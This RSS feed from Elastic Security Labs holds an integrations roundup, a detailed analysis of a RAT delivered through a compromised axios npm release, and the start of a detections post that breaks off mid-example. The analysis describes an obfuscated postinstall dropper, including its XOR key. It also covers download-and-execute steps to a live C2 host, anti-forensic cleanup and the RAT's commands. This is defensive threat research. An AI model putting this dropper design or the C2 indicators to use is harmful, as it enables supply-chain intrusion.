<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>Elastic Security Labs - Product Updates</title>
        <link>https://www.elastic.co/security-labs</link>
        <description>Trusted security news &amp; research from the team at Elastic.</description>
        <lastBuildDate>Mon, 13 Apr 2026 16:54:38 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        
        <copyright>© 2026. elasticsearch B.V. All Rights Reserved</copyright>
        <item>
            <title><![CDATA[Elastic Security Integrations Roundup: Q1 2026]]></title>
            <link>https://www.elastic.co/security-labs/elastic-security-integrations-roundup-q1-2026</link>
            <guid>elastic-security-integrations-roundup-q1-2026</guid>
            <pubDate>Sat, 04 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs announces nine new integrations for Elastic Security spanning cloud security, endpoint visibility, email threat detection, identity and SIEM.]]></description>
            <content:encoded><![CDATA[<h2>A quarterly look at Elastic’s security integrations ecosystem</h2>
<p>Security teams can only protect what they can see. Gaps in coverage, like a macOS fleet generating logs that never reach your SIEM, an email gateway running in isolation, or a cloud environment producing findings that stay siloed in the vendor console, are easily exploited by attackers.</p>
<p>Elastic’s answer to this is continuous and open investment in third-party integrations, built on the belief that a strong security ecosystem requires deep integrations that make data from every corner of the stack searchable and contextualized. Today, we’re announcing nine new integrations for Elastic Security spanning cloud security, endpoint visibility, email threat detection, identity and SIEM.</p>
<p>Each integration ships with ingest pipelines that normalize and structure data out of the box, along with prebuilt dashboards that serve as an immediate starting point for visualization and analysis, so teams can search, correlate and investigate across new data sources from day one without writing or maintaining parsers.</p>
<h2>macOS Security Events</h2>
<p>Elastic Defend, the native integration that delivers Elastic Endpoint Security, collects rich security telemetry on macOS, and it is intentionally focused on high-value detection signals rather than full system auditing. Login and logout events, account creation and deletion, service registration changes and application diagnostic logs all live outside that scope, leaving threat hunters and IR teams without complete macOS context. The macOS Security Events integration complements Elastic Defend, providing the same depth of OS-level visibility offered to Windows devices via the Windows Event Logs integration.</p>
<p>MacOS endpoints generate tens of thousands of unified log entries per endpoint. Left unfiltered, that volume creates noise rather than signals. This integration ships with predicate-based filters that scope ingestion to security-relevant events: authentication activity, process execution, network connections, file system changes, and system configuration modifications.</p>
<p>These predicate-based filters enable comprehensive macOS coverage without the cost or complexity of ingesting everything. Once ingested, these events are immediately available to Elastic Security’s AI Assistant. Analysts can ask natural-language questions like &quot;Show me all privilege escalation attempts on macOS endpoints in the last 24 hours&quot; or &quot;Summarize login failures for this host”, turning raw unified log entries into actionable investigation context without writing a single query.</p>
<p>Check out the <a href="https://www.elastic.co/docs/reference/integrations/macos">macOS Security Events</a> integration.</p>
<h2>IBM QRadar</h2>
<p>For teams running IBM QRadar in parallel with Elastic Security, alert ingestion into Elastic has become easier. The QRadar integration collects offense records from QRadar’s offense and rules endpoints, enriching each alert with the triggering rule’s name, ID, type and ownership, so analysts can triage in Elastic without switching back to QRadar.</p>
<p>This integration is the foundation of Elastic’s SIEM migration workflow for QRadar, which mirrors the capability already available for <a href="https://www.elastic.co/docs/reference/integrations/splunk">Splunk</a>. Teams can also use <a href="https://www.elastic.co/security-labs/from-qradar-to-elastic">Automatic Migration</a> for migrating their QRadar rules into Elastic. It uses semantic search and generative AI to map existing rules to Elastic’s 1,300+ prebuilt detections, and translates anything that doesn’t map directly into ES|QL, allowing you to consolidate your SIEM footprint without manually rebuilding your entire detection library.</p>
<p>Check out the <a href="https://www.elastic.co/docs/reference/integrations/ibm_qradar">IBM QRadar</a> integration.</p>
<h2>Proofpoint Essentials</h2>
<p>For Enterprise customers, Proofpoint’s TAP (Targeted Attack Protection) has been available in Elastic. To provide the same email threat visibility to SMB environments and the MSP and MSSPs who serve them, Proofpoint Essentials is now available.</p>
<p>The Proofpoint Essentials integration streams four event types into Elastic Security:</p>
<ul>
<li>Clicks on malicious URLs that were blocked</li>
<li>Clicks that were permitted</li>
<li>Messages blocked for containing threats recognized by URL Defense or Attachment Defense</li>
<li>Messages delivered despite containing those threats</li>
</ul>
<p>To easily surface this data, two prebuilt dashboards are available:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-security-integrations-roundup-q1-2026/image2.png" alt="Clicks Overview dashboard shows blocked versus permitted click trends over time, broken down by threat status and classification." title="Clicks Overview dashboard shows blocked versus permitted click trends over time, broken down by threat status and classification." /></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-security-integrations-roundup-q1-2026/image1.png" alt="Threat Overview dashboard shows blocked versus permitted click trends over time, broken down by threat status and classification." title="Threat Overview dashboard shows blocked versus permitted click trends over time, broken down by threat status and classification." /></p>
<p>For an SMB SOC team, this means phishing attempts, malware detections and policy violations land in the same platform as the rest of your security telemetry, removing the need to switch platforms to understand the full context of a threat.</p>
<p>Check out the <a href="https://www.elastic.co/docs/reference/integrations/proofpoint_essentials">Proofpoint Essentials</a> integration.</p>
<h2>AWS Security Hub</h2>
<p>AWS Security Hub aggregates findings across your AWS environment, but investigating those findings means staying inside the AWS console, separate from the rest of your team’s security data. The Elastic integration changes this by pulling Security Hub findings into Elastic in Open Cybersecurity Schema Framework (OCSF) format and normalizing them to ECS, offering schema-consistent data that’s immediately searchable via ES|QL.</p>
<p>Findings land in the <a href="https://www.elastic.co/docs/solutions/security/cloud/findings-page-3">Elastic Vulnerability Findings</a> page, integrating AWS cloud security posture directly into the workflows already in place. From there, you can correlate Security Hub data with signals from other sources - endpoint alerts, identity events, network telemetry - to build a fuller picture of risk across your AWS environment and investigate faster than the native console allows.</p>
<p>Check out the <a href="https://www.elastic.co/docs/reference/integrations/aws_securityhub">AWS Security Hub</a> integration.</p>
<h2>More new Elastic Security integrations</h2>
<p>In addition to the featured integrations above, the following integrations are now available, each shipping with prebuilt dashboards for immediate value:</p>
<ul>
<li><a href="https://www.elastic.co/docs/reference/integrations/jupiter_one">JupiterOne</a>: Asset intelligence and cloud attack surface monitoring, ingesting cross-tool alerts, CVE findings, and threat detections enriched with MITRE ATT&amp;CK mappings and CVSS scores, and host context for unified risk visibility.</li>
<li><a href="https://www.elastic.co/docs/reference/integrations/airlock_digital">Airlock Digital</a>: Application allowlisting and execution control telemetry, capturing blocked process executions with command lines, file hashes and publisher context, so unauthorized execution attempts are visible and correlatable alongside the rest of your endpoint detections.</li>
<li><a href="https://www.elastic.co/docs/reference/integrations/island_browser">Island Browser</a>: Enterprise browser security events spanning user navigation, device posture, compromised credential detection and admin activity, extending Elastic’s visibility to BYOD and unmanaged devices where traditional endpoint agents can’t be deployed.</li>
<li><a href="https://www.elastic.co/docs/reference/integrations/ironscales">Ironscales</a>: AI-powered phishing detection events capturing email metadata, sender reputation, affected mailbox counts and suspicious links, correlatable with endpoint and identity data for faster investigation and response.</li>
<li><a href="https://www.elastic.co/docs/reference/integrations/cyera">Cyera</a>: Data security posture management events, surfacing sensitive data risks including exposure severity, affected record counts, compliance framework violations, and datastore ownership across cloud environments, so sensitive data exposure doesn’t stay siloed in a separate DSPM console.</li>
</ul>
<h2>Get started</h2>
<p>These integrations Elastic’s open approach to security. All nine integrations in this roundup ship with prebuilt dashboards and native ECS mappings, giving your team immediate visibility with no additional setup or custom visualization work required.</p>
<p>From there, findings, alerts and logs are immediately available to Elastic’s broader <a href="https://www.elastic.co/docs/solutions/security/ai/identify-investigate-document-threats">detection and investigation capabilities</a>: Attack Discovery for surfacing multi-stage threats, AI Assistant for natural-language investigation and guided response, and to ES|QL and EQL for custom detection and hunting queries.</p>
<ul>
<li><a href="https://www.elastic.co/integrations/data-integrations?solution=security">Browse available integrations</a></li>
<li><a href="https://www.elastic.co/blog/automatic-migration-ai-rule-translation">Learn about migrating to Elastic Security from other SIEMs</a></li>
</ul>
<p>Have questions or feedback? Join #security-siem in the <a href="https://www.elastic.co/community/">Elastic Stack Community Slack</a>.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/elastic-security-integrations-roundup-q1-2026/elastic-security-integrations-roundup-q1-2026.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Inside the Axios supply chain compromise - one RAT to rule them all]]></title>
            <link>https://www.elastic.co/security-labs/axios-one-rat-to-rule-them-all</link>
            <guid>axios-one-rat-to-rule-them-all</guid>
            <pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs analyzes a supply chain compromise of the axios npm package delivering a unified cross-platform RAT]]></description>
            <content:encoded><![CDATA[<blockquote>
<p>Elastic Security Labs released <a href="https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections">initial triage and detection rules</a> for the Axios supply-chain compromise. This is a detailed analysis of the RAT and payloads.</p>
</blockquote>
<h2>Introduction</h2>
<p>Elastic Security Labs identified a supply chain compromise of the axios npm package, one of the most depended-upon packages in the JavaScript ecosystem with approximately 100 million weekly downloads. The attacker compromised a maintainer account and published backdoored versions that delivered a cross-platform Remote Access Trojan to macOS, Windows, and Linux systems through a malicious postinstall hook.</p>
<h3>Key takeaways</h3>
<ul>
<li>A compromised npm maintainer account (jasonsaayman) was used to publish two malicious versions of the widely used Axios HTTP client — 1.14.1 (tagged latest) and 0.30.4 (tagged legacy) — meaning a default npm install axios resolved to a backdoored package</li>
<li>The malicious JavaScript deploys platform-specific stage-2 implants for macOS, Windows, and Linux</li>
<li>All three stage-2 payloads are implementations of the <strong>same RAT</strong> — identical C2 protocol, command set, beacon cadence, and spoofed user-agent, written in PowerShell (Windows), C++ (macOS), and Python (Linux)</li>
<li>The dropper performs anti-forensic cleanup by deleting itself and swapping its package.json with a clean copy, erasing evidence of the postinstall trigger from <code>node_modules</code></li>
</ul>
<h2>Preamble</h2>
<p>On March 30, 2026, Elastic Security Labs detected a supply chain compromise targeting the <a href="https://www.npmjs.com/package/axios">axios</a> npm package through automated supply-chain monitoring. The attacker gained control of the npm account belonging to jasonsaayman, one of the project's primary maintainers, and published two backdoored versions within a 39-minute window.</p>
<p>The axios package is one of the most widely depended-upon HTTP client libraries in the JavaScript ecosystem. At the time of discovery, both the latest and legacy dist-tags pointed to compromised versions, ensuring that the majority of fresh installations pulled a backdoored release.</p>
<p>The malicious versions introduced a single new dependency: plain-crypto-js, a purpose-built package whose postinstall hook silently downloaded and executed platform-specific stage-2 RAT implants from sfrclak[.]com:8000.</p>
<p>What makes this campaign notable beyond its blast radius is the stage-2 tooling. The attacker deployed three parallel implementations of the <strong>same RAT</strong> — one each for Windows, macOS, and Linux — all sharing an identical C2 protocol, command structure, and beacon behavior. This isn't three different tools; it's a single cross-platform implant framework with platform-native implementations.</p>
<p>Elastic Security Labs filed a GitHub Security Advisory to the axios repository on <strong>March 31, 2026 at 01:50 AM UTC</strong> to coordinate disclosure and ensure the maintainers and npm registry could act on the compromised versions.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-one-rat-to-rule-them-all/image3.png" alt="GitHub Security Advisory filed to the axios repository" title="GitHub Security Advisory filed to the axios repository" /></p>
<p>As the community flagged the compromise on social media, Elastic Security Labs shared early findings publicly to help defenders respond in real time.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-one-rat-to-rule-them-all/image2.png" alt="Early coordination on X as Elastic Security Labs began sharing indicators and analysis during the active compromise" title="Early coordination on X as Elastic Security Labs began sharing indicators and analysis during the active compromise" /></p>
<p>This post covers the full attack chain: from the npm-level supply chain compromise through the obfuscated dropper, to the architecture of the cross-platform RAT and the meaningful differences between its three variants.</p>
<h2>Campaign overview</h2>
<p>The compromise is evident from the npm registry metadata. The maintainer email changed from <code>jasonsaayman@gmail[.]com</code> — present on all prior legitimate releases — to <code>ifstap@proton[.]me</code> on the malicious versions. The publishing method also changed:</p>
<table>
<thead>
<tr>
<th>Version</th>
<th>Published By</th>
<th>Method</th>
<th>Provenance</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>axios@1.14.0</code> (legitimate)</td>
<td><code>jasonsaayman@gmail[.]com</code></td>
<td>GitHub Actions OIDC</td>
<td>SLSA provenance attestations</td>
</tr>
<tr>
<td><code>axios@1.14.1</code> (compromised)</td>
<td><code>ifstap@proton[.]me</code></td>
<td>Direct CLI publish</td>
<td>None</td>
</tr>
<tr>
<td><code>axios@0.30.4</code> (compromised)</td>
<td><code>ifstap@proton[.]me</code></td>
<td>Direct CLI publish</td>
<td>None</td>
</tr>
</tbody>
</table>
<p>The shift from a trusted OIDC publisher flow with SLSA provenance to a direct CLI publish with a changed email is a clear indicator of unauthorized access.</p>
<h3>Timeline</h3>
<ul>
<li><strong>2026-02-18 17:19 UTC</strong> — <code>axios@0.30.3</code> published legitimately by <code>jasonsaayman@gmail[.]com</code></li>
<li><strong>2026-03-27 19:01 UTC</strong> — <code>axios@1.14.0</code> published legitimately via GitHub Actions OIDC</li>
<li><strong>2026-03-30 05:57 UTC</strong> — <code>plain-crypto-js@4.2.0</code> published by <code>nrwise</code> (<code>nrwise@proton.me</code>) — clean decoy to build registry history</li>
<li><strong>2026-03-30 23:59 UTC</strong> — <code>plain-crypto-js@4.2.1</code> published by <code>nrwise</code> — malicious version with <code>postinstall</code> backdoor</li>
<li><strong>2026-03-31 00:21 UTC</strong> — <code>axios@1.14.1</code> published by compromised account — tagged <code>latest</code></li>
<li><strong>2026-03-31 01:00 UTC</strong> — <code>axios@0.30.4</code> published by compromised account — tagged <code>legacy</code></li>
</ul>
<h3>Affected packages</h3>
<ul>
<li><strong><code>axios@1.14.1</code> — Malicious, tagged <code>latest</code> at time of discovery</strong></li>
<li><strong><code>axios@0.30.4</code> — Malicious, tagged <code>legacy</code> at time of discovery</strong></li>
<li><strong><code>plain-crypto-js@4.2.0</code> — Clean decoy, published to build registry history</strong></li>
<li><strong><code>plain-crypto-js@4.2.1</code> — Malicious, payload delivery vehicle (<code>postinstall</code> backdoor)</strong></li>
</ul>
<p><strong>Safe versions:</strong> <code>axios@1.14.0</code> (last legitimate 1.x release with SLSA provenance) and <code>axios@0.30.3</code> (last legitimate <code>0.30.x</code> release).</p>
<p>The attacker tagged both the latest and legacy channels, maximizing the blast radius across projects using either the current or legacy axios API.</p>
<h2>Code analysis</h2>
<h3>Stage 1: The plain-crypto-js dropper</h3>
<p>The entire delivery chain hinges on npm's postinstall lifecycle hook. Installing either compromised axios version pulls <code>plain-crypto-js@^4.2.1</code> as a dependency, which declares:</p>
<pre><code class="language-json">&quot;scripts&quot;: {
  &quot;postinstall&quot;: &quot;node setup.js&quot;
}
</code></pre>
<p>This causes setup.js to execute automatically during npm install — no user interaction required.</p>
<p>The setup.js file uses a two-layer encoding scheme to conceal its behavior:</p>
<ul>
<li><strong>Layer 1:</strong> String reversal followed by Base64 decoding</li>
<li><strong>Layer 2:</strong> XOR cipher using the key OrDeR_7077 with a position-dependent index (7 * i² % 10)</li>
</ul>
<p>All critical strings, module names, URLs, shell commands are stored in an encoded array stq[] and decoded at runtime. The decoded contents reveal the operational infrastructure:</p>
<h3>Platform-specific delivery</h3>
<p>After decoding its string table, the dropper checks os.platform() and branches into one of three delivery routines. Each sends an HTTP POST to <a href="http://sfrclak%5B.%5Dcom:8000/6202033">http://sfrclak[.]com:8000/6202033</a> with a platform-specific body — packages.npm.org/product0 (macOS), packages.npm.org/product1 (Windows), packages.npm.org/product2 (Linux) — allowing the C2 to serve the correct payload from a single endpoint. The packages.npm.org/ prefix is a deliberate attempt to make outbound traffic appear as benign npm registry communication in network logs:</p>
<table>
<thead>
<tr>
<th>Platform</th>
<th>Delivery Method</th>
<th>Stage-2 Location</th>
<th>Disguise</th>
</tr>
</thead>
<tbody>
<tr>
<td>macOS</td>
<td>AppleScript via osascript downloads binary with curl</td>
<td><code>/Library/Caches/com.apple.act.mond</code></td>
<td>Apple system daemon</td>
</tr>
<tr>
<td>Windows</td>
<td>VBScript downloads .ps1 via curl, executes via renamed PowerShell (<code>%PROGRAMDATA%\wt.exe</code>)</td>
<td><code>%TEMP%\6202033.ps1</code> (transient)</td>
<td>Windows Terminal</td>
</tr>
<tr>
<td>Linux</td>
<td>Direct curl download and python3 execution</td>
<td><code>/tmp/ld.py</code></td>
<td>None</td>
</tr>
</tbody>
</table>
<h3>Anti-forensics</h3>
<p>The dropper performs two cleanup actions:</p>
<ol>
<li><strong>Self-deletion:</strong> setup.js removes itself via fs.unlink(__filename)</li>
<li><strong>Package manifest swap:</strong> A clean file named package.md (containing a benign version 4.2.0 configuration with no postinstall hook) is renamed to package.json, overwriting the malicious version</li>
</ol>
<p>Post-incident inspection of node_modules/plain-crypto-js/package.json reveals no trace of the postinstall trigger. The malicious setup.js is gone. Only the lockfile and npm audit logs retain evidence.</p>
<h3>Stage 2: Cross-platform RAT</h3>
<p>The three stage-2 payloads: PowerShell for Windows, compiled C++ for macOS, Python for Linux  are not three different tools. They are three implementations of the <strong>same RAT specification</strong>, sharing an identical C2 protocol, command set, message format, and operational behavior. The consistency strongly indicates a single developer or tightly coordinated team working from a shared design document.</p>
<h4>Shared architecture</h4>
<p>The following properties are <strong>identical across all three variants:</strong></p>
<ul>
<li><strong>C2 transport: HTTP POST</strong></li>
<li><strong>Body encoding: Base64-encoded JSON</strong></li>
<li><strong>User-Agent: <code>mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)</code></strong></li>
<li><strong>Beacon interval: 60 seconds</strong></li>
<li><strong>Session UID: 16-character random alphanumeric string, generated per-execution</strong></li>
<li><strong>Outbound message types: <code>FirstInfo</code>, <code>BaseInfo</code>, <code>CmdResult</code></strong></li>
<li><strong>Inbound command types: <code>kill</code>, <code>peinject</code>, <code>runscript</code>, <code>rundir</code></strong></li>
<li><strong>Response command types: <code>rsp_kill</code>, <code>rsp_peinject</code>, <code>rsp_runscript</code>, <code>rsp_rundir</code></strong></li>
</ul>
<p>The spoofed IE8/Windows XP user-agent string is particularly notable, it is anachronistic on all three platforms, and its presence on a macOS or Linux host is a strong detection indicator.</p>
<h4>Initialization and reconnaissance</h4>
<p>On startup, each variant:</p>
<ol>
<li><strong>Generates a session UID</strong> — 16 random alphanumeric characters, included in every subsequent C2 message</li>
<li><strong>Detects OS and architecture</strong> — reports platform-specific identifiers (e.g., windows_x64, macOS, linux_x64)</li>
<li><strong>Enumerates initial directories</strong> of interest (user profile, documents, desktop, config directories)</li>
<li><strong>Sends a FirstInfo beacon</strong> containing the UID, OS identifier, and directory snapshot</li>
</ol>
<p>After initialization, the implant enters the main loop. The first BaseInfo heartbeat includes a comprehensive system profile. The same categories of data are collected on all platforms, though the underlying APIs differ:</p>
<table>
<thead>
<tr>
<th>Data Collected</th>
<th>Windows Source</th>
<th>macOS Source</th>
<th>Linux Source</th>
</tr>
</thead>
<tbody>
<tr>
<td>Hostname</td>
<td>%COMPUTERNAME% env var</td>
<td>gethostname()</td>
<td>/proc/sys/kernel/hostname</td>
</tr>
<tr>
<td>Username</td>
<td>%USERNAME% env var</td>
<td>getuid() + getpwuid()</td>
<td>os.getlogin()</td>
</tr>
<tr>
<td>OS version</td>
<td>WMI / registry</td>
<td>sysctlbyname(&quot;kern.osproductversion&quot;)</td>
<td>platform.system() + platform.release()</td>
</tr>
<tr>
<td>Timezone</td>
<td>System timezone</td>
<td>localtime_r()</td>
<td>datetime.timezone</td>
</tr>
<tr>
<td>Boot time</td>
<td>System uptime</td>
<td>sysctl(&quot;kern.boottime&quot;)</td>
<td>/proc/uptime</td>
</tr>
<tr>
<td>Install date</td>
<td>Registry / WMI</td>
<td>stat(&quot;/&quot;) or sysctl</td>
<td>ctime of /var/log/installer or /var/log/dpkg.log</td>
</tr>
<tr>
<td>Hardware model</td>
<td>WMI</td>
<td>sysctlbyname(&quot;hw.model&quot;)</td>
<td>/sys/class/dmi/id/product_name</td>
</tr>
<tr>
<td>CPU type</td>
<td>WMI</td>
<td>sysctlbyname()</td>
<td>platform.machine()</td>
</tr>
<tr>
<td>Process list</td>
<td>Full PID, session, name, path</td>
<td>popen(&quot;ps&quot;) (up to 1000)</td>
<td>Full /proc enumeration (PID, PPID, user, cmdline)</td>
</tr>
</tbody>
</table>
<p>Subsequent heartbeats are lightweight, containing only a timestamp to confirm the implant is alive.</p>
<h4>Command dispatch</h4>
<p>The C2 response is parsed as JSON, and the type field determines the action. All three variants implement the same four commands:</p>
<p><strong>kill — Self-termination.</strong> Sends an rsp_kill acknowledgment and exits. The Windows variant's persistence mechanism (registry key + batch file) survives the kill command unless explicitly cleaned up; the macOS and Linux variants have no persistence of their own.</p>
<p><strong>runscript — Script/command execution.</strong> The operator's primary interaction command. Accepts a Script field (code to execute) and a Param field (arguments). When Script is empty, Param is run directly as a command. The execution mechanism is platform-native:</p>
<table>
<thead>
<tr>
<th>Platform</th>
<th>Execution Mechanism</th>
</tr>
</thead>
<tbody>
<tr>
<td>Windows</td>
<td>PowerShell with -NoProfile -ep Bypass</td>
</tr>
<tr>
<td>macOS</td>
<td>AppleScript via /usr/bin/osascript</td>
</tr>
<tr>
<td>Linux</td>
<td>Shell via subprocess.run(shell=True) or Python via python3 -c</td>
</tr>
</tbody>
</table>
<p><strong>peinject — Binary payload delivery.</strong> Despite the Windows-centric naming (&quot;PE inject&quot;), all three platforms implement this as a way to drop and execute binary payloads:</p>
<table>
<thead>
<tr>
<th>Platform</th>
<th>Implementation</th>
</tr>
</thead>
<tbody>
<tr>
<td>Windows</td>
<td>Reflective .NET assembly loading via [System.Reflection.Assembly]::Load()</td>
</tr>
<tr>
<td>macOS</td>
<td>Base64-decodes and drops a binary, executes with operator-supplied parameters.</td>
</tr>
<tr>
<td>Linux</td>
<td>Base64-decodes a binary to /tmp/.&lt;random 6-char string&gt; (hidden file), launches via subprocess.Popen().</td>
</tr>
</tbody>
</table>
<p>The Windows implementation has in-memory execution with no file drop but without disabling AMSI which will certainly flag on the Assembly load. The macOS and Linux variants take the simpler approach of writing a binary to disk and executing it directly.</p>
<p><strong>rundir — Directory enumeration.</strong> Accepts paths and returns detailed file listings (name, size, type, creation/modification timestamps, child count for directories). Allows the operator to interactively browse the filesystem.</p>
<h4>Capability summary</h4>
<table>
<thead>
<tr>
<th>Capability</th>
<th>Windows (PowerShell)</th>
<th>macOS (C++)</th>
<th>Linux (Python)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Persistence</td>
<td>Registry Run key + hidden .bat</td>
<td>None</td>
<td>None</td>
</tr>
<tr>
<td>Script execution</td>
<td>PowerShell</td>
<td>AppleScript via osascript</td>
<td>Shell or Python inline</td>
</tr>
<tr>
<td>Binary injection</td>
<td>Reflective .NET load injecting into cmd.exe</td>
<td>Binary drop + execute</td>
<td>Binary drop to /tmp/ + execute</td>
</tr>
<tr>
<td>Anti-forensics</td>
<td>Hidden windows, temp file cleanup</td>
<td>Hidden temp .scpt</td>
<td>Hidden /tmp/.XXXXXX files</td>
</tr>
</tbody>
</table>
<h2>Attribution</h2>
<p>The macOS Mach-O binary delivered by the <code>plain-crypto-js</code> postinstall hook exhibits significant overlap with <strong>WAVESHAPER</strong>, a C++ backdoor tracked by Mandiant and attributed to <strong>UNC1069</strong>, a DPRK-linked threat cluster.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-one-rat-to-rule-them-all/image1.png" alt="Side-by-side comparison of the axios compromise macOS sample and WAVESHAPER indicators" title="Side-by-side comparison of the axios compromise macOS sample and WAVESHAPER indicators" /></p>
<h2>Conclusion</h2>
<p>This campaign demonstrates the continued attractiveness of the npm ecosystem as a supply chain attack vector. By compromising a single maintainer account on one of the JavaScript ecosystem's most depended-upon packages, the attacker gained a delivery mechanism with potential reach into millions of environments.</p>
<p>The toolkit's most reliable detection indicator is also its most curious design choice: the IE8/Windows XP user-agent string hardcoded identically across all three platform variants. While it provides a consistent protocol fingerprint for C2 server-side routing, it is trivially detectable on any modern network — and is an immediate anomaly on macOS and Linux hosts.</p>
<p>Elastic Security Labs will continue monitoring this activity cluster and will update this post with any additional findings.</p>
<h2>MITRE ATT&amp;CK</h2>
<p>Elastic uses the <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a> framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.</p>
<h3>Tactics</h3>
<p>Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/tactics/TA0001/">Initial Access</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0002/">Execution</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0003/">Persistence</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0005/">Defense Evasion</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0007/">Discovery</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0011/">Command and Control</a></li>
</ul>
<h3>Techniques</h3>
<p>Techniques represent how an adversary achieves a tactical goal by performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1195/001/">Supply Chain Compromise: Compromise Software Dependencies</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/007/">Command and Scripting Interpreter: JavaScript</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/001/">Command and Scripting Interpreter: PowerShell</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/002/">Command and Scripting Interpreter: AppleScript</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/004/">Command and Scripting Interpreter: Unix Shell</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/006/">Command and Scripting Interpreter: Python</a></li>
<li><a href="https://attack.mitre.org/techniques/T1547/001/">Boot or Logon Autostart Execution: Registry Run Keys</a></li>
<li><a href="https://attack.mitre.org/techniques/T1027/">Obfuscated Files or Information</a></li>
<li><a href="https://attack.mitre.org/techniques/T1036/">Masquerading</a></li>
<li><a href="https://attack.mitre.org/techniques/T1564/001/">Hidden Files and Directories</a></li>
<li><a href="https://attack.mitre.org/techniques/T1055/">Process Injection</a></li>
<li><a href="https://attack.mitre.org/techniques/T1070/004/">Indicator Removal: File Deletion</a></li>
<li><a href="https://attack.mitre.org/techniques/T1082/">System Information Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1057/">Process Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1083/">File and Directory Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1071/001/">Application Layer Protocol: Web Protocols</a></li>
<li><a href="https://attack.mitre.org/techniques/T1571/">Non-Standard Port</a></li>
<li><a href="https://attack.mitre.org/techniques/T1132/001/">Data Encoding: Standard Encoding</a></li>
<li><a href="https://attack.mitre.org/techniques/T1105/">Ingress Tool Transfer</a></li>
</ul>
<h2>Observations</h2>
<p>The following observables were discussed in this research.</p>
<table>
<thead>
<tr>
<th align="left">Observable</th>
<th align="left">Type</th>
<th align="left">Name</th>
<th align="left">Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101</code></td>
<td align="left">SHA-256</td>
<td align="left"><code>6202033.ps1</code></td>
<td align="left">Windows payload</td>
</tr>
<tr>
<td align="left"><code>92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a</code></td>
<td align="left">SHA-256</td>
<td align="left"><code>com.apple.act.mond</code></td>
<td align="left">MacOS payload</td>
</tr>
<tr>
<td align="left"><code>fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf</code></td>
<td align="left">SHA-256</td>
<td align="left"><code>ld.py</code></td>
<td align="left">Linux payload</td>
</tr>
<tr>
<td align="left"><code>sfrclak[.]com</code></td>
<td align="left">DOMAIN</td>
<td align="left"></td>
<td align="left">C2</td>
</tr>
<tr>
<td align="left"><code>142.11.206[.]73</code></td>
<td align="left">ipv4-addr</td>
<td align="left"></td>
<td align="left">C2</td>
</tr>
</tbody>
</table>
<h2>References</h2>
<p>The following were referenced throughout the above research:</p>
<ul>
<li><a href="https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections">https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections</a></li>
</ul>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/axios-one-rat-to-rule-them-all/axios-one-rat-to-rule-them-all.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Elastic releases detections for the Axios supply chain compromise]]></title>
            <link>https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections</link>
            <guid>axios-supply-chain-compromise-detections</guid>
            <pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Hunting and detection rules for the Elastic-discovered Axios supply chain compromise.]]></description>
            <content:encoded><![CDATA[<blockquote>
<p>Elastic Security Labs is releasing an initial triage and detection rules for the Axios supply-chain compromise. We have <a href="https://www.elastic.co/security-labs/axios-one-rat-to-rule-them-all">released a detailed analysis</a> on the Axios compromise RAT and payloads.</p>
</blockquote>
<blockquote>
<p>Elastic Security Labs filed a GitHub Security Advisory to the axios repository on March 31, 2026 at 01:50 AM UTC to coordinate disclosure and ensure the maintainers and npm registry could act on the compromised versions.</p>
</blockquote>
<h2>Introduction</h2>
<p>We are currently tracking a supply chain attack involving malicious Axios package versions that introduce a secondary dependency used for post-install execution. Rather than embedding malicious logic directly into the primary package, the attacker leveraged a transitive dependency to trigger execution during installation and deploy a cross-platform payload.</p>
<p>Elastic observed consistent execution patterns across impacted systems immediately after <code>npm install</code> of the malicious Axios versions (<code>1.14.1</code>, <code>0.30.4</code>). The added dependency (<code>plain-crypto-js@4.2.1</code>) executed during <code>postinstall</code> and was quickly followed by a second-stage payload.</p>
<p>Across Linux, Windows, and macOS, the activity followed the same structure:</p>
<pre><code>node (npm install)
